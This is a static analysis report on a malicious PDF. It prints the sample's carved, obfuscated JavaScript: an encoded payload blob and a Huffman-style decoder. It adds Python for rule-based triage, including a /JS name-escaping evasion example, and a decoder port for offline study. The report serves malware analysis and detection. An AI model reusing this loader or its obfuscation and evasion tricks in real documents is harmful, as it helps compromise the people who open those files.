Malicious PDF — malware analysis report

Static analysis result for SHA-256 74b777a3fd846c41…

MALICIOUS

PDF

2.6 KB
MD5: d5cfab14551e04af16072f8e0187c26e
SHA-1: 2dcec6215f283d6147ffbf3e86d9b9755323edd9
SHA-256: 74b777a3fd846c41ca30f26ff7deb12799587e182ce6160ae9f1e47a01f0a860

Risk Score: 116

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 Command and Scripting Interpreter: JavaScript

The sample is a 2.6 KB PDF carrying two /JS streams. The first (object 263984) is almost entirely data: two string literals in a custom 64-character alphabet plus a length, 2695. The second (object 263985) is the decoder. It expands the first string, two characters at a time, into a lookup table whose negative entries are jump targets and whose non-negative entries are character codes, then walks that table bit by bit over the second string and assembles the result with String.fromCharCode. This is a compact Huffman-style decoder, and it is the eval/fromCharCode staging pattern that the PDF_JS_EXPLOIT_CLUSTER rule keys on. Note what the carved scripts do not show: the decoded 2695-character string (emyrynh5) is never consumed in either artifact, so the download-and-execute second stage is inferred from the decoder structure and the volume of encoded data rather than observed; whatever evaluates the result (an additional action or an eval in an object that was not carved) should be located before the T1203 mapping is treated as confirmed. The ML classifier scores the PDF as malicious with maximum confidence.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (4)

  • JavaScript action (severity: low; 2 related findings; rule: PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (severity: critical; rule: PDF_JS_EXPLOIT_CLUSTER)
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream (severity: low; rule: PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
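The three JavaScript rules above compose as simple checks over the file's text once its streams have been inflated: /JavaScript and /JS alone score low, and either of them together with a staging token escalates to critical. As an added illustration, not the scanner's own code, the following Python reproduces that scoring against constructed PDFs: a FlateDecode'd /JS stream that rebuilds and evals a hex blob (scores critical), the same stream with the /JS name hex-escaped as /J#53 (still scores, because names are normalised before matching), and an AcroForm field running AFNumber_Format (scores low only, as the rule text says it should). The rule names and severities are the report's; the regexes, the /Length-based stream extraction and the sample PDFs are assumptions of this example.

```python
import re
import zlib

# Exploit-staging tokens named in the PDF_JS_EXPLOIT_CLUSTER rule description.
STAGING = re.compile(rb"\b(eval|unescape|fromCharCode)\b|/XFA")


def normalise_names(data: bytes) -> bytes:
    """Resolve #xx escapes in PDF names so that /J#53 is scored like /JS."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> list[bytes]:
    """Best effort: return the body (inflated when it is zlib data) of every
    stream whose dictionary carries a direct /Length. Indirect lengths and
    other filters are not handled; a real carver resolves those via the xref."""
    bodies = []
    for m in re.finditer(rb"/Length\s+(\d+)\b[^>]*>>\s*stream\r?\n", data):
        body = data[m.end():m.end() + int(m.group(1))]
        try:
            bodies.append(zlib.decompress(body))
        except zlib.error:
            bodies.append(body)  # not compressed (or not zlib): scan as-is
    return bodies


def triage(pdf_bytes: bytes):
    """Score a PDF with the report's three JavaScript rules.
    Returns (findings, staging_tokens); findings are (rule, severity) pairs."""
    text = normalise_names(pdf_bytes + b"\n" + b"\n".join(inflate_streams(pdf_bytes)))
    has_action = b"/JavaScript" in text
    has_stream = re.search(rb"/JS\b", text) is not None
    findings = []
    if has_action:
        findings.append(("PDF_JAVASCRIPT", "low"))
    if has_stream:
        findings.append(("PDF_JS", "low"))
    staging = sorted({m.group(0).decode() for m in STAGING.finditer(text)})
    if (has_action or has_stream) and staging:
        findings.append(("PDF_JS_EXPLOIT_CLUSTER", "critical"))
    return findings, staging


def make_pdf(script: bytes, compress: bool, js_name: bytes = b"/JS") -> bytes:
    """Constructed minimal PDF: a catalog OpenAction that runs one /JS stream."""
    body = zlib.compress(script) if compress else script
    filt = b" /Filter /FlateDecode" if compress else b""
    return b"".join([
        b"%PDF-1.4\n",
        b"1 0 obj << /Type /Catalog /OpenAction << /S /JavaScript ", js_name,
        b" 2 0 R >> >> endobj\n",
        b"2 0 obj << /Length ", str(len(body)).encode(), filt, b" >>\nstream\n",
        body, b"\nendstream\nendobj\n",
        b"trailer << /Root 1 0 R >>\n%%EOF\n",
    ])


# Constructed inputs (not the carved sample): a staged script that rebuilds
# "app.alert(1)" from hex and evals it, once FlateDecode'd and once with the
# /JS name hex-escaped, plus a benign form field whose action is library code.
STAGED = (b'x="";s="6170702e616c657274283129";'
          b'while(s.length){x+=String.fromCharCode(parseInt(s.slice(0,2),16));'
          b's=s.slice(2)}eval(x)')
MALICIOUS = make_pdf(STAGED, compress=True)
EVASIVE = make_pdf(STAGED, compress=False, js_name=b"/J#53")
BENIGN_FORM = (b"%PDF-1.4\n"
               b"1 0 obj << /Type /Catalog /AcroForm << /Fields [2 0 R] >> >> endobj\n"
               b"2 0 obj << /FT /Tx /T (total) /AA << /F << /S /JavaScript "
               b'/JS (AFNumber_Format(2, 0, 0, 0, "", true);) >> >> >> endobj\n'
               b"trailer << /Root 1 0 R >>\n%%EOF\n")

if __name__ == "__main__":
    for name, pdf in (("malicious", MALICIOUS), ("evasive", EVASIVE), ("benign form", BENIGN_FORM)):
        print(name, *triage(pdf))
```

The two things this makes concrete are why the report scores carved files rather than the raw PDF (the staging tokens only become visible after the stream is inflated) and why a name-level match alone is weak evidence: the benign form trips the same two low-severity rules as the sample and differs only in the absence of staging tokens.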

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: javascript_obj263984_000.js
SHA-256: c00d191bf3b27b32ad543d64884896dec301afad08f9ae66a1518c8f48ec6e12
Kind: pdf-javascript-stream
Source: PDF /JS object 263984 at offset 0x197
Size: 2432 bytes
Preview script
First 1,000 lines of the extracted script
imbvflh="0T1E1Z1f2Z1d3P1`1a242R1^3a1[2L2U1R1W3K1U2b1S3Z3_1P2]1L1M272f1J3^1H3S1F3f3h1=1B3`1@2_1>3N3Y0`1:3M183L163d1.11122Y2e1/2T2W0g0j1*3/330h3+3-0c0d3G3T0a3=3E0^2[0[3]0Y2h0W3b0U2V2g0:0K0P2O0N2d0L3V3X0I2J0G2^0A0D2S0B3I3Q0=0>3W3c0;2X3R06072`3O042a2c";bpysg=".Nf,dgY9:MehXMcX7E.H9/Qh>a^b-gF0?=hIQ_a_7E.H9/UeECfVYI_b?0Sj`7VhZj1+O??7L91L`-feP[1M[BeF0?;j8-4SV;cg@Sh=BM[cWI1ND9/bMeHf0JjTPaHPcR`ZeF0?=aO_HQSV;cg@8Q+Kj8--JZc6TK[1TY7Y5RM^[0`9TQ`iSY=^[0ZacG8-4RF;eP6Sh:AR6+J6+K_c6TK[1T2VVh=eJY?***+_c6TK[1T5.E=5N@Sh<=eHB:WR_HK6WJ:P0[_3K@G,<CP:J+YZJ**:P5*.3TbaK58+D.d=*K/*/R:Uf+,H_-2:04,.4-aR:L^P:LJhT.`R9K9D,>3C<JK/+e_3f;=2<^/+,B?Q:PD`V2**e.+Z+,7,bB:14a.**,._:8K/Xbc:*+_3JJ,.i@E,Hf<:PDZ_2**e.ZZ+,H1I,**+,,.*:LWON2**e.i:+,Hf<:PDZ_2**e.Vc*K*F5R=]67,@]=2:-GD.**,..`c:K<J,.jZe.VC^2=@OG,6fGK50+>3gJ,.haNK/BZ_2**D.ZZ+,<Z:R:1BD.**,._Q]K00h_2+V,.**,.Z67,<Z:R:1C_2**.2*F<.*83,D=d:M-He.+aE,**+,I5-:QX_N2?f-:J*+R=-*.2*F<.@*:R:6cN3S9O,67fR:1CV2**.22@0K6352:*+_3gJ,.haNK6`KR:*+_3KJ,.g8i.**,..2*K/E52:*+_3gJ,.haNK6`KR:*+_3CZ+,*cA:QNBD.WNP:J0fB:**2:=AK,/4*2=j-R<[Q6K7D?_2^Wa.VB/:Q]*2=bD<.?M-:J*+R=-*.35+,K*GKR:**2=<I4.BEb:J0Z2:**2=*Z_35+,K*GQ:J**:J+[2:*cN3S9O,67fR:1CV2**.3gV7,Hf<:K8BD.**7,BB*K*-L:LZ,/,+Q.K73gR;KYG,*f7K***K+,Z_3K3C,**8K35*.3JV@K63PZP7C4.CE9K***K***K***K***K***K***K***K***K8[;>3LLO:Q5GN3J/+,/4d_2SbI,4B*:Q8c>2SQ4K87_R=Q/0K,S/0K*+=R=V>?,B+<R=K/0K/8e_3]X?,GK;R:T[?R=,J,.fHO,/HU2=UGN2__*:JMI4..?gR;J@,.4ZPZKS,@K9N2T.Vc>R;U@+,*/P:J**:M@+D.*^PR:**2:LbG,IJ@K*6dT.**,.4-aR=f/I,8B^R;U*W,*C^>2**.2_We_2+Q,K***K*V;D.F`i:J*+R:M:+,+BL_2dUgK**-:P**:K/L7:Qc/R:-8DK***K6_M>2V`C_3Q.@K9Z5:J0F`,**+,6fd:L[A]K+6[_2=K@K,OC4.^:?,D_T_3Pf4.@G4_2/W,.6?i:J*+R<^J,.OZXK,5G_3R6G,+B-:MKIN2**D.i:+,.@C_3i+D.*^PR:**2=@P@K*+Z:J**:J**:J**:J**:J**:J**:J**:Q]*2;^Ad,**0K6c*K7j,R::Vi..2:R=7Z>2-L7:QJ^B;STaZJ04?,DWU>3P6W,4CKR;:O5:KW?V2SLO:J*SN3KV].>S=2:RUK:Q6fB=QF4.[A4K/GZR=PG4.>fVK,J*2=Xd>2>+@:KWd>2?jC,*1C,/0e_2?EQ:KWfc=Y4,.*,JK,OGg2>+<R:ZU.K8gZR=W4?,GBaZQ5F4.dKK:K:0a.4-YK8OB>3C?OR<:**hF8Q+O>82h;dO`7Vh9T5.E=5N@YSWQX]hj=G>BeF0?:cM`=E9=eL559
>bG-=^5TECe1e,hWhZeF0?:cM`7L91L`9T<I=^,/W0M_323+,<,:-`ZeF0?=BM[cW=eK1`fG1[FDa2gH59eSWQX1=J]T1.HSLe=O^>iRD[O7b:ATJ**,d=F>;CCceF0?:ObT0ML9>[G3]h9T*f=/_Q5_jeBXNdF[aP5S8ARI1eX1cc6TTTgagXL99.E7jBXNdGYO9TE.H9/T1e5.E=5N@8Q+O>I^J]T1.HSFGUZSObeQ`39SdK,aM;e.+J6K*B-+ecG8-4SiY^eED0UMWH/6XjA_a^bCHjSj_S>V7F9]cfAK=5Y`-feO[aY,PAIMSj8-4RYIQ[eUdLg_[0Pj/`bWSh=H`dSL7A^/dSWBAE[H.9SPg^LA0QcgM=I@d1Kdj?H1UWX?[aY,PAIMjF8J";awxlkl=2695;kmcvy=new Array();
Filename: javascript_obj263985_001.js
SHA-256: 01b70d8333944ff1dfcccc44190b137cf46ee69740b87747350fff0d4267e2e8
Kind: pdf-javascript-stream
Source: PDF /JS object 263985 at offset 0x871
Size: 492 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
while(imbvflh.length){kmcvy.push((yrjsi(imbvflh.charCodeAt(0))<<(4+2))+yrjsi(imbvflh.charCodeAt(1))-(500+12));imbvflh=imbvflh.slice(2,imbvflh.length)}foatkqy=kzbnepk=imbvflh=0;emyrynh5='';function yrjsi(apbpxng){if(apbpxng>92)apbpxng--;return apbpxng-42}function iscuhtd(){if(imbvflh==0){kzbnepk=yrjsi(bpysg.charCodeAt(foatkqy++));imbvflh=6;}return ((kzbnepk>>--imbvflh)&0x01);}while(awxlkl--){i=0;while(kmcvy[i]<0){if(iscuhtd())i=-kmcvy[i];else i++;}emyrynh5+=String.fromCharCode(kmcvy[i]);}
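The decoder above is short but deliberately unreadable. As an added example (not the page's or the analysis tool's code, and not the sample's own), the following Python port gives each piece a descriptive name so the algorithm can be read and, more usefully, run offline on the carved strings without ever executing their output: yrjsi becomes sym, the first while loop becomes build_table, iscuhtd becomes bits_of, the final loop becomes decode, and imbvflh, bpysg and awxlkl are the table_text, bits_text and count arguments. Because the page does not show an encoder, one is constructed here (Huffman tree, flattened in the layout the decoder expects) purely so the port can be exercised on a constructed string; the 512 table bias, the 6-bit alphabet starting at '*' with backslash skipped, and the jump/leaf semantics are read directly from the sample.

```python
import heapq
from collections import Counter

# Alphabet: 64 values mapped onto printable ASCII starting at '*' (42), with
# backslash (92) skipped so the text can sit inside a JavaScript string literal.
BIAS, SKIPPED = 42, 92
TABLE_BIAS = 512  # the sample's "(500+12)"


def sym(c: str) -> int:
    """One alphabet character -> 6-bit value (the sample's yrjsi)."""
    code = ord(c)
    if code > SKIPPED:
        code -= 1
    return code - BIAS


def unsym(v: int) -> str:
    """Inverse of sym; only the constructed encoder below needs it."""
    if not 0 <= v < 64:
        raise ValueError(f"not a 6-bit value: {v}")
    code = v + BIAS
    if code >= SKIPPED:
        code += 1
    return chr(code)


def build_table(table_text: str) -> list[int]:
    """Two characters -> one signed 12-bit entry (the sample's first loop).
    Negative entries are jump targets (tree nodes); non-negative entries are
    character codes (leaves)."""
    if len(table_text) % 2:
        raise ValueError("table text must have an even length")
    return [(sym(table_text[i]) << 6) + sym(table_text[i + 1]) - TABLE_BIAS
            for i in range(0, len(table_text), 2)]


def bits_of(bits_text: str):
    """Yield bits MSB-first, six per character (the sample's iscuhtd)."""
    for c in bits_text:
        v = sym(c)
        for shift in range(5, -1, -1):
            yield (v >> shift) & 1


def decode(table_text: str, bits_text: str, count: int) -> str:
    """Walk the table once per output character (the sample's last loop): at a
    negative entry, bit 1 jumps to index -entry and bit 0 steps to the next
    entry; a non-negative entry is emitted (String.fromCharCode)."""
    table = build_table(table_text)
    bits = bits_of(bits_text)
    out = []
    for _ in range(count):
        i = 0
        while table[i] < 0:
            # Past the end of bpysg, charCodeAt yields NaN, which shifts to 0 bits.
            i = -table[i] if next(bits, 0) else i + 1
        out.append(chr(table[i]))
    return "".join(out)


def _huffman_tree(text: str):
    """Leaf = one-character str, node = (zero_child, one_child)."""
    heap = [(n, k, ch) for k, (ch, n) in enumerate(Counter(text).items())]
    heapq.heapify(heap)
    tick = len(heap)
    while len(heap) > 1:
        n0, _, a = heapq.heappop(heap)
        n1, _, b = heapq.heappop(heap)
        heapq.heappush(heap, (n0 + n1, tick, (a, b)))
        tick += 1
    return heap[0][2]


def _flatten(node, table: list, codes: dict, prefix: str = "") -> None:
    """Lay the tree out as decode() expects: node, zero-subtree, one-subtree,
    with the node entry patched to -(index where the one-subtree starts)."""
    if isinstance(node, str):
        if ord(node) >= 4096 - TABLE_BIAS:
            raise ValueError("character code does not fit a 12-bit table entry")
        table.append(ord(node))
        codes[node] = prefix
        return
    at = len(table)
    table.append(0)
    _flatten(node[0], table, codes, prefix + "0")
    table[at] = -len(table)
    _flatten(node[1], table, codes, prefix + "1")


def encode(text: str) -> tuple[str, str, int]:
    """Constructed encoder (assumption, not from the sample) producing
    (table_text, bits_text, count) that decode() turns back into text."""
    if not text:
        return "", "", 0
    table, codes = [], {}
    _flatten(_huffman_tree(text), table, codes)
    if len(table) > TABLE_BIAS:
        raise ValueError("too many distinct characters for a 12-bit jump target")
    table_text = "".join(unsym((v + TABLE_BIAS) >> 6) + unsym((v + TABLE_BIAS) & 63)
                         for v in table)
    bitstring = "".join(codes[ch] for ch in text)
    bitstring += "0" * (-len(bitstring) % 6)
    bits_text = "".join(unsym(int(bitstring[i:i + 6], 2))
                        for i in range(0, len(bitstring), 6))
    return table_text, bits_text, len(text)


if __name__ == "__main__":
    # Constructed round trip; for the real sample pass the imbvflh and bpysg
    # literals from javascript_obj263984_000.js and awxlkl (2695) as count.
    t, b, n = encode('app.alert("constructed sample");')
    print(t, b, n)
    print(decode(t, b, n))
```

Two details worth noticing when reading the carved strings against this port: the first pair of imbvflh, "0T", decodes to -86, so the tree's root is a node that jumps to entry 86 on a 1 bit, and the alphabet never produces a double quote or backslash, which is exactly what lets the blobs be dropped into a JS string literal unescaped. Run decode on the carved strings and inspect the returned text; do not eval it.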